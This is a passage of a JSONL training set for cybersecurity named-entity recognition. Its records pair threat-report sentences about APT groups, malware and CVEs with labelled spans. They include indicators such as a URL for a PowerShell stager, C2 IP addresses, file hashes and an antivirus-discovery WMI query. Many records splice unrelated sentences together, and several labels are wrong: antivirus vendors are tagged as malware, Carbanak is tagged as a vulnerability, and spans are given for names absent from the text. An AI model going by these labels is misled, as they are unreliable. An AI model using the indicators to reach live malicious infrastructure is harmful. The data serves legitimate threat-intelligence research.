We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"TOOL: FakeM": [[100, 105]], "THREAT_ACTOR: Scarlet Mimic": [[153, 166]], "MALWARE: Carbanak": [[224, 232]], "THREAT_ACTOR: criminals": [[299, 308]], "ORGANIZATION: financial industry": [[349, 367]], "ORGANIZATION: customers": [[391, 400]]}, "info": {"id": "cyberner_stix_train_003018", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . attacks using this tool were still active as of April 2016 .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]]}, "info": {"id": "cyberner_stix_train_003019", "source": "cyberner_stix_train"}} {"text": "Moreover , BusyGasper boasts some keylogging tools – the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language . The email contained a malicious link to http://mynetwork.ddns.net:880 . 
UNC1878 has used various offensive security tools , most commonly Cobalt Strike BEACON , along with legitimate tools and built - in commands such as PSEXEC , WMI , and BITSadmin .", "spans": {"MALWARE: BusyGasper": [[11, 21]], "TOOL: email": [[337, 342]], "URL: http://mynetwork.ddns.net:880": [[373, 402]], "THREAT_ACTOR: UNC1878": [[405, 412]], "TOOL: Cobalt Strike BEACON": [[471, 491]], "TOOL: PSEXEC": [[554, 560]], "TOOL: WMI": [[563, 566]], "TOOL: BITSadmin": [[573, 582]]}, "info": {"id": "cyberner_stix_train_003020", "source": "cyberner_stix_train"}} {"text": "With relevant visualized information , analysts are able to study malware behavior on impacted machines , so they can investigate further and plan out their response .", "spans": {"TOOL: relevant visualized information": [[5, 36]]}, "info": {"id": "cyberner_stix_train_003021", "source": "cyberner_stix_train"}} {"text": "Next , the module enters an infinite loop .", "spans": {}, "info": {"id": "cyberner_stix_train_003022", "source": "cyberner_stix_train"}} {"text": "In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": {"MALWARE: Malware": [[235, 242]]}, "info": {"id": "cyberner_stix_train_003023", "source": "cyberner_stix_train"}} {"text": "On September 12 , 2016 , the “ Fancy Bears ’ Hack Team ” persona claimed to have compromised WADA and released athletes ’ medical records as “ proof of American athletes taking doping. 
”", "spans": {"THREAT_ACTOR: Fancy Bears": [[31, 42]], "ORGANIZATION: WADA": [[93, 97]]}, "info": {"id": "cyberner_stix_train_003024", "source": "cyberner_stix_train"}} {"text": "Kill switches are used by many malware authors to remove traces from a device after a successful operation . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable .", "spans": {"THREAT_ACTOR: APT28": [[109, 114]], "VULNERABILITY: EternalBlue exploit": [[155, 174]], "TOOL: open source tool": [[183, 199]], "TOOL: Responder": [[200, 209]], "MALWARE: ProjectSauron": [[316, 329]], "MALWARE: malicious modules": [[339, 356]]}, "info": {"id": "cyberner_stix_train_003025", "source": "cyberner_stix_train"}} {"text": "The messages looked as follows : “ % USERNAME % , ti ho inviato il soldi sul subito subito-a [ . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . The fake svchost binary is the KONNI malware .", "spans": {"ORGANIZATION: \bTrend Micro": [[97, 109]], "THREAT_ACTOR: MuddyWater": [[138, 148]], "THREAT_ACTOR: actor": [[165, 170]], "MALWARE: KONNI": [[249, 254]]}, "info": {"id": "cyberner_stix_train_003026", "source": "cyberner_stix_train"}} {"text": "[27089,28618,9833,4170,25722,19977,2369,21426,3435,7442,30146,21719,16140,16280,16688,22550,19867,194,3298] .", "spans": {}, "info": {"id": "cyberner_stix_train_003027", "source": "cyberner_stix_train"}} {"text": "One of the samples ( e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 ) uses the C2 server svcws [ . 
In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software . The value name of this entry varies from sample to sample . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"TOOL: Lurk module": [[172, 183]], "TOOL: NetSupport RAT": [[421, 435]]}, "info": {"id": "cyberner_stix_train_003028", "source": "cyberner_stix_train"}} {"text": "Because CVE-2015-3043 is already patched , this remote exploit will not succeed on a fully patched system .", "spans": {"VULNERABILITY: CVE-2015-3043": [[8, 21]]}, "info": {"id": "cyberner_stix_train_003029", "source": "cyberner_stix_train"}} {"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "MALWARE: ActiveMime files": [[48, 64]], "MALWARE: Win32/Barlaiy": [[185, 198]], "TOOL: C&C": [[309, 312]]}, "info": {"id": "cyberner_stix_train_003030", "source": "cyberner_stix_train"}} {"text": "The \" porn kr sex '' APK connects to a malicious website that runs XLoader in the background . The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility . The TXT record returned contained data: E0000>0 . 
Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware ’s behavior .", "spans": {"MALWARE: XLoader": [[67, 74]], "THREAT_ACTOR: APT16": [[109, 114]], "ORGANIZATION: government agency": [[142, 159]], "ORGANIZATION: media organizations": [[191, 210]], "MALWARE: Ransomware source code": [[299, 321]]}, "info": {"id": "cyberner_stix_train_003031", "source": "cyberner_stix_train"}} {"text": "setFullScreenIntent ( ) – This API wires the notification to a GUI so that it pops up when the user taps on it . Honeybee appears to target humanitarian aid and inter-Korean affairs . “ HexRaysDeob ” However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": {"THREAT_ACTOR: Honeybee": [[113, 121]], "TOOL: HexRaysDeob": [[186, 197]], "THREAT_ACTOR: fraudsters": [[245, 255]]}, "info": {"id": "cyberner_stix_train_003032", "source": "cyberner_stix_train"}} {"text": "C2 Communication The C2 communication includes two parts : sending information to the remote HTTP server and parsing the server ’ s response to execute any commands as instructed by the remote attackers . The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries . This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years . 
As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": {"TOOL: Helminth": [[209, 217]], "TOOL: HTTP": [[358, 362]], "TOOL: DNS": [[367, 370]], "ORGANIZATION: State , Local , Tribal , and Tribunal ( SLTT ) governments": [[582, 640]], "THREAT_ACTOR: LockBit": [[651, 658]], "ORGANIZATION: MS - ISAC": [[670, 679]]}, "info": {"id": "cyberner_stix_train_003033", "source": "cyberner_stix_train"}} {"text": "Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: threat actors": [[91, 104]], "ORGANIZATION: Unit 42": [[265, 272]], "MALWARE: NetTraveler": [[296, 307]], "VULNERABILITY: exploit": [[321, 328]], "VULNERABILITY: CVE-2012-0158": [[329, 342]], "MALWARE: NetTraveler Trojan": [[354, 372]]}, "info": {"id": "cyberner_stix_train_003034", "source": "cyberner_stix_train"}} {"text": "Since then , we have seen Poison Ivy samples using third-levels of querlyurl [ . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . 
Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": {"MALWARE: Poison Ivy": [[26, 36]], "THREAT_ACTOR: attacks": [[118, 125]], "THREAT_ACTOR: APT33": [[296, 301]]}, "info": {"id": "cyberner_stix_train_003035", "source": "cyberner_stix_train"}} {"text": "Dragos threat intelligence leverages the Dragos Platform , our threat operations center , and other sources to provide comprehensive insight into threats affecting industrial control security and safety worldwide .", "spans": {"ORGANIZATION: Dragos": [[0, 6], [41, 47]]}, "info": {"id": "cyberner_stix_train_003036", "source": "cyberner_stix_train"}} {"text": "( Have a look here and here . Hackers are charged with spying on a manufacturer of gas turbines . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system .", "spans": {"THREAT_ACTOR: Hackers": [[30, 37]], "ORGANIZATION: manufacturer": [[67, 79]], "THREAT_ACTOR: attackers": [[138, 147]], "MALWARE: DDE protocol": [[173, 185]]}, "info": {"id": "cyberner_stix_train_003037", "source": "cyberner_stix_train"}} {"text": "Unusual domains , the use of URL shorteners , and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware . For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use . They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013 .", "spans": {}, "info": {"id": "cyberner_stix_train_003038", "source": "cyberner_stix_train"}} {"text": "The module contains the following hardcoded C2 server names :", "spans": {"TOOL: C2": [[44, 46]]}, "info": {"id": "cyberner_stix_train_003039", "source": "cyberner_stix_train"}} {"text": "When in doubt , check the APK signature and hash in sources like VirusTotal before installing it on your device . 
In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes .", "spans": {"ORGANIZATION: VirusTotal": [[65, 75]], "MALWARE: malicious attachments": [[204, 225]], "TOOL: Scout": [[274, 279]], "THREAT_ACTOR: DRAGONFISH": [[374, 384]], "THREAT_ACTOR: Lotus Blossom": [[388, 401]], "MALWARE: Elise": [[433, 438]], "MALWARE: malware": [[439, 446]]}, "info": {"id": "cyberner_stix_train_003040", "source": "cyberner_stix_train"}} {"text": "Device admin policies Looking at the policy 's definition , we can see that it lists all the available policies even if most of them are deprecated on Android 10.0 and their usage results in a security exception . According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website . f9cfda6062a8ac9e332186a7ec0e706a . 
Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": {"SYSTEM: Android 10.0": [[151, 163]], "ORGANIZATION: Myanmar Union Election Commission": [[485, 518]], "ORGANIZATION: UEC": [[521, 524]], "FILEPATH: f9cfda6062a8ac9e332186a7ec0e706a": [[537, 569]], "THREAT_ACTOR: Steal or Forge Authentication Certificates APT29": [[589, 637]]}, "info": {"id": "cyberner_stix_train_003041", "source": "cyberner_stix_train"}} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "ORGANIZATION: financial institutions": [[217, 239]], "THREAT_ACTOR: MoneyTaker group": [[313, 329]]}, "info": {"id": "cyberner_stix_train_003042", "source": "cyberner_stix_train"}} {"text": "Extensive targeting of defense ministries and other military victims has been observed , the profile of which closely mirrors the strategic interests of the Russian government , and may indicate affiliation with GRU , Russia ’s premier military intelligence service .", "spans": {"ORGANIZATION: GRU": [[212, 215]]}, "info": {"id": "cyberner_stix_train_003043", "source": "cyberner_stix_train"}} {"text": "Unfortunately , we have had no chance to obtain this file , but we speculate that Device.exe is responsible for opening port 6378 , and the CenterUpdater.exe tool was used for creating tunneling to a remote host .", "spans": {"FILEPATH: Device.exe": [[82, 92]], "FILEPATH: CenterUpdater.exe": [[140, 157]]}, "info": {"id": 
"cyberner_stix_train_003044", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 104.238.184.252 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 104.238.184.252": [[11, 26]]}, "info": {"id": "cyberner_stix_train_003045", "source": "cyberner_stix_train"}} {"text": "Connexxa was a company also from Catanzaro . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware . The backdoor queries Windows for installed antivirus software using WMI : SELECT * FROM AntiVirusProduct It looks for specific antivirus and security products installed on the infected machine , such as Kaspersky , eScan , F-secure and Bitdefender . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": {"TOOL: ICS malware": [[196, 207]], "MALWARE: backdoor": [[214, 222]], "SYSTEM: Windows": [[231, 238]], "TOOL: WMI": [[278, 281]], "MALWARE: Kaspersky": [[413, 422]], "MALWARE: eScan": [[425, 430]], "MALWARE: F-secure": [[433, 441]], "MALWARE: Bitdefender": [[446, 457]], "ORGANIZATION: The Chaos Creator": [[467, 484]], "ORGANIZATION: Harrison": [[520, 528]], "ORGANIZATION: Ashley Madison": [[533, 547]]}, "info": {"id": "cyberner_stix_train_003046", "source": "cyberner_stix_train"}} {"text": "Analysis of evasion techniques Along with the standard payload and string obfuscation , Cerberus uses a rather interesting technique to prevent analysis of the Trojan . By introducing small changes to their code and infrastructure , the group has bypassed several security products . 
APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"MALWARE: Cerberus": [[88, 96]], "THREAT_ACTOR: group": [[237, 242]], "THREAT_ACTOR: APT39": [[284, 289]], "ORGANIZATION: telecommunications and travel industries": [[306, 346]], "ORGANIZATION: specific individuals": [[433, 453]]}, "info": {"id": "cyberner_stix_train_003047", "source": "cyberner_stix_train"}} {"text": "In addition , the same attackers appear to have a lengthy operation history including attacks on other industries and organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_003048", "source": "cyberner_stix_train"}} {"text": "This payload will then attempt to instantiate a remote reverse /system/bin/sh shell to the Command & Control ws.my-local-weather [ . Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts . Daily summary of news concerning different Palestinian govenment related issues d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 . 
Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": {"TOOL: Nidiran back door": [[181, 198]], "TOOL: hacktools": [[222, 231]], "ORGANIZATION: Palestinian govenment": [[316, 337]], "FILEPATH: d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428": [[353, 417]], "THREAT_ACTOR: Attackers": [[420, 429]]}, "info": {"id": "cyberner_stix_train_003049", "source": "cyberner_stix_train"}} {"text": "Using email as a C2 channel may also decrease the chance of detection , as sending email via non-sanctioned email providers may not necessarily construe suspicious or even malicious activity in many enterprises .", "spans": {"TOOL: email": [[6, 11], [83, 88], [108, 113]], "TOOL: C2": [[17, 19]]}, "info": {"id": "cyberner_stix_train_003050", "source": "cyberner_stix_train"}} {"text": "The malware then uses WebDAV to upload the RAR archive to a Box account . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: WebDAV": [[22, 28]], "MALWARE: RAR archive": [[43, 54]], "MALWARE: Carbanak": [[103, 111]], "ORGANIZATION: financial institution": [[142, 163]]}, "info": {"id": "cyberner_stix_train_003051", "source": "cyberner_stix_train"}} {"text": ") “ % USERNAME % , j ’ ai fait l ’ avance ( suivi d ’ un lien ) : leboncoin-le [ . The cyber espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . 
Surprisingly , this isn't the easiest or the most efficient technical choice for HTTP connection .", "spans": {"THREAT_ACTOR: APT32": [[109, 114], [198, 203]], "TOOL: backdoors": [[140, 149]], "TOOL: scripts": [[154, 161]]}, "info": {"id": "cyberner_stix_train_003052", "source": "cyberner_stix_train"}} {"text": "Receiver Intent Name Description BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": {"THREAT_ACTOR: APT41": [[160, 165]], "THREAT_ACTOR: APT28": [[338, 343]]}, "info": {"id": "cyberner_stix_train_003053", "source": "cyberner_stix_train"}} {"text": "All three shared the same IPs and URLs , also provided below .", "spans": {"TOOL: IPs": [[26, 29]], "TOOL: URLs": [[34, 38]]}, "info": {"id": "cyberner_stix_train_003054", "source": "cyberner_stix_train"}} {"text": "In most cases however , the customers ’ IT operation center don’t know they exist on the network .", "spans": {}, "info": {"id": "cyberner_stix_train_003055", "source": "cyberner_stix_train"}} {"text": "In the previous campaign where adversaries used Office document exploits as an infection vector , the payload was executed in the Office word process .", "spans": {"TOOL: Office": [[48, 54], [130, 136]]}, "info": {"id": "cyberner_stix_train_003056", "source": "cyberner_stix_train"}} {"text": "It seems that the people who filled these roles are key to “ Agent Smith ’ s success , yet not quite necessary for actor ’ s legitimate side of business . Starting in December 2014 , the criminal group began running keyloggers in the infected system . 
With a high degree of confidence , we can confirm that at least two distinct groups are focused on attacking this sector ; there is also a third group , though it is unclear if its focus is solely on this sector or if carries out other types of attacks . ( CISA , CNN )", "spans": {"MALWARE: Agent Smith": [[61, 72]], "TOOL: keyloggers": [[216, 226]], "ORGANIZATION: CISA": [[509, 513]], "ORGANIZATION: CNN": [[516, 519]]}, "info": {"id": "cyberner_stix_train_003058", "source": "cyberner_stix_train"}} {"text": "The response can either be a simple \" OK , '' or can be a request to perform some action on the device . In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea .", "spans": {"ORGANIZATION: Presidential Administration": [[250, 277]], "THREAT_ACTOR: Gamaredon Group": [[324, 339]], "THREAT_ACTOR: APT37": [[378, 383]]}, "info": {"id": "cyberner_stix_train_003059", "source": "cyberner_stix_train"}} {"text": "In a root broken device , security is a fairy tale . Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 . 
In later maturity levels , Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework .", "spans": {"THREAT_ACTOR: Cyber Army": [[108, 118]], "THREAT_ACTOR: Ashiyane": [[121, 129]], "THREAT_ACTOR: Cyber Resistance Group": [[140, 162]], "THREAT_ACTOR: Izz ad-Din al-Qassam Cyber Fighters": [[165, 200]], "THREAT_ACTOR: Parastoo": [[203, 211]], "THREAT_ACTOR: Shabgard": [[214, 222]], "THREAT_ACTOR: Iran Black Hats": [[225, 240]], "ORGANIZATION: JumpCloud": [[330, 339]], "MALWARE: malicious code": [[354, 368]]}, "info": {"id": "cyberner_stix_train_003060", "source": "cyberner_stix_train"}} {"text": "The Tor node would intercept any unencrypted executable files being downloaded and modify those executables by adding a malicious wrapper contained an embedded OnionDuke .", "spans": {"TOOL: Tor": [[4, 7]], "MALWARE: OnionDuke": [[160, 169]]}, "info": {"id": "cyberner_stix_train_003061", "source": "cyberner_stix_train"}} {"text": "CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[49, 56]]}, "info": {"id": "cyberner_stix_train_003062", "source": "cyberner_stix_train"}} {"text": "The app connects to the MQTT broker with hardcoded username and password and a unique device identifier generated for each device . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor . Its C2 is based on IIS using .asp technology to handle the victims’ HTTP . 
This “ est ” reference could refer to a hacking group with its own message board on which hack520 also posts regularly .", "spans": {"ORGANIZATION: Cybereason": [[132, 142]], "TOOL: Backdoor.Win32.Denis": [[181, 201]], "THREAT_ACTOR: OceanLotus Group": [[209, 225]], "THREAT_ACTOR: threat actor": [[313, 325]], "TOOL: C2": [[332, 334]], "TOOL: IIS": [[347, 350]], "FILEPATH: .asp": [[357, 361]], "ORGANIZATION: hack520": [[493, 500]]}, "info": {"id": "cyberner_stix_train_003063", "source": "cyberner_stix_train"}} {"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"MALWARE: RIPPER": [[58, 64]], "ORGANIZATION: Government officials": [[132, 152]]}, "info": {"id": "cyberner_stix_train_003064", "source": "cyberner_stix_train"}} {"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 1.doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 . 
Mandiant is not aware of any configuration change that can be made to force request logging for these endpoints .", "spans": {"MALWARE: DroidJack RAT": [[91, 104]], "THREAT_ACTOR: admin@338": [[233, 242]], "ORGANIZATION: financial services": [[310, 328]], "ORGANIZATION: telecoms": [[331, 339]], "ORGANIZATION: government": [[342, 352]], "ORGANIZATION: defense sectors": [[359, 374]], "FILEPATH: 1.doc": [[377, 382]], "FILEPATH: 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8": [[385, 449]], "ORGANIZATION: Mandiant": [[452, 460]]}, "info": {"id": "cyberner_stix_train_003065", "source": "cyberner_stix_train"}} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]], "THREAT_ACTOR: actor": [[257, 262]], "VULNERABILITY: CVE-2012-0158": [[302, 315]], "THREAT_ACTOR: Spring Dragon": [[339, 352]]}, "info": {"id": "cyberner_stix_train_003066", "source": "cyberner_stix_train"}} {"text": "In a sample I recently analyzed , something stood out as extremely suspicious which led me down a rabbit hole , uncovering malicious infrastructure supporting Chthonic , Nymaim , and other malware and malicious websites .", "spans": {"MALWARE: Chthonic": [[159, 167]], "MALWARE: Nymaim": [[170, 176]]}, "info": {"id": "cyberner_stix_train_003067", "source": "cyberner_stix_train"}} {"text": "The Mimikatz variant uploaded to these two organizations is unique , as it involves a seemingly custom loader application written in .NET .", "spans": {"TOOL: Mimikatz": [[4, 12]], "TOOL: .NET": [[133, 137]]}, "info": {"id": 
"cyberner_stix_train_003068", "source": "cyberner_stix_train"}} {"text": "Android bots have also already been found being controlled via other non-traditional means – blogs or some of the many cloud messaging systems like Google ’ s or Baidu ’ s – but Twitoor is the first Twitter-based bot malware , according to Štefanko . In total , 35 actors have been tied to Scattered Canary’s operations since the group emerged in 2008 . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey .", "spans": {"SYSTEM: Android": [[0, 7]], "ORGANIZATION: Google": [[148, 154]], "ORGANIZATION: Baidu": [[162, 167]], "MALWARE: Twitoor": [[178, 185]], "SYSTEM: Twitter-based": [[199, 212]], "THREAT_ACTOR: Scattered Canary’s": [[290, 308]], "THREAT_ACTOR: Lazarus": [[354, 361]], "ORGANIZATION: banks": [[475, 480]]}, "info": {"id": "cyberner_stix_train_003069", "source": "cyberner_stix_train"}} {"text": "] 132:28833 61 [ . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth . This PowerShell script is a version of the Empire Invoke-PSInject module , with very few modifications . Figure 1 : URL vulnerable to CVE-2023 - 4966 https:///oauth / idp/.well - known / openid - configuration", "spans": {"THREAT_ACTOR: group": [[136, 141]], "TOOL: PowerShell": [[231, 241]], "TOOL: Empire Invoke-PSInject": [[269, 291]], "VULNERABILITY: CVE-2023 - 4966": [[360, 375]]}, "info": {"id": "cyberner_stix_train_003071", "source": "cyberner_stix_train"}} {"text": "Trojan details Upon boot , the trojan will start by populating a shared preferences file with the configuration it has on its internal structures . 
During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[178, 189]], "ORGANIZATION: FireEye iSIGHT Intelligence": [[414, 441]], "THREAT_ACTOR: APT37": [[488, 493]], "VULNERABILITY: zero-day": [[506, 514]], "TOOL: Adobe Flash": [[515, 526]], "VULNERABILITY: CVE-2018-4878": [[543, 556]], "MALWARE: DOGCALL": [[573, 580]], "MALWARE: malware": [[581, 588]]}, "info": {"id": "cyberner_stix_train_003072", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . The affected organizations we were able to identify are mostly based in the Middle East .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]]}, "info": {"id": "cyberner_stix_train_003073", "source": "cyberner_stix_train"}} {"text": "Desert Scorpion 's second stage is capable of installing another non-malicious application ( included in the second stage ) which is highly specific to the Fatah political party and supports the targeting theory . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit . Some of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks . 
In April 2023 , media reports suggested that the U.S. government determined that Zarya breached a Canadian oil pipeline .", "spans": {"MALWARE: Desert Scorpion": [[0, 15]], "ORGANIZATION: Fatah": [[156, 161]], "THREAT_ACTOR: Lazarus Group": [[230, 243]], "THREAT_ACTOR: group": [[365, 370]], "THREAT_ACTOR: Bluenoroff": [[394, 404]], "THREAT_ACTOR: Elfin": [[504, 509]]}, "info": {"id": "cyberner_stix_train_003074", "source": "cyberner_stix_train"}} {"text": "2014 : OnionDuke gets caught using a malicious Tor node .", "spans": {"MALWARE: OnionDuke": [[7, 16]], "TOOL: Tor": [[47, 50]]}, "info": {"id": "cyberner_stix_train_003075", "source": "cyberner_stix_train"}} {"text": "DeltaCharlie is a DDoS tool used by HIDDEN COBRA actors , and is referenced and detailed in Novetta 's Operation Blockbuster Destructive Malware report .", "spans": {"MALWARE: DeltaCharlie": [[0, 12]], "THREAT_ACTOR: HIDDEN COBRA": [[36, 48]], "ORGANIZATION: Novetta": [[92, 99]]}, "info": {"id": "cyberner_stix_train_003076", "source": "cyberner_stix_train"}} {"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. , IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g. While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved away from applications like wget , Remote Manipulator Tool , VNC and ChkFlsh.exe . 
If the next block is resolved , The overlaps in targeting and sharing of infrastructure amongst DPRK groups highlights the continued targeting and coordinated interest in the cryptocurrency field .", "spans": {"SYSTEM: GSM": [[55, 58]], "SYSTEM: WhatsApp": [[61, 69]], "SYSTEM: Telegram": [[72, 80]], "SYSTEM: Facebook": [[83, 91]], "SYSTEM: Threema": [[98, 105]], "SYSTEM: Android": [[330, 337]], "TOOL: batch scripts": [[526, 539]], "TOOL: SFX files": [[544, 553]], "THREAT_ACTOR: Gamaredon Group": [[560, 575]], "TOOL: wget": [[614, 618]], "TOOL: Remote Manipulator Tool": [[621, 644]], "TOOL: VNC": [[647, 650]], "TOOL: ChkFlsh.exe": [[655, 666]], "THREAT_ACTOR: DPRK groups": [[765, 776]]}, "info": {"id": "cyberner_stix_train_003077", "source": "cyberner_stix_train"}} {"text": "This would explain the number of victims – there are less than 10 of them and according to our detection statistics , they are all located in the Russia . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies . At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192.119.15.35 880 http://mynetwork.ddns.net:880/st-36-p4578.ps1 . 
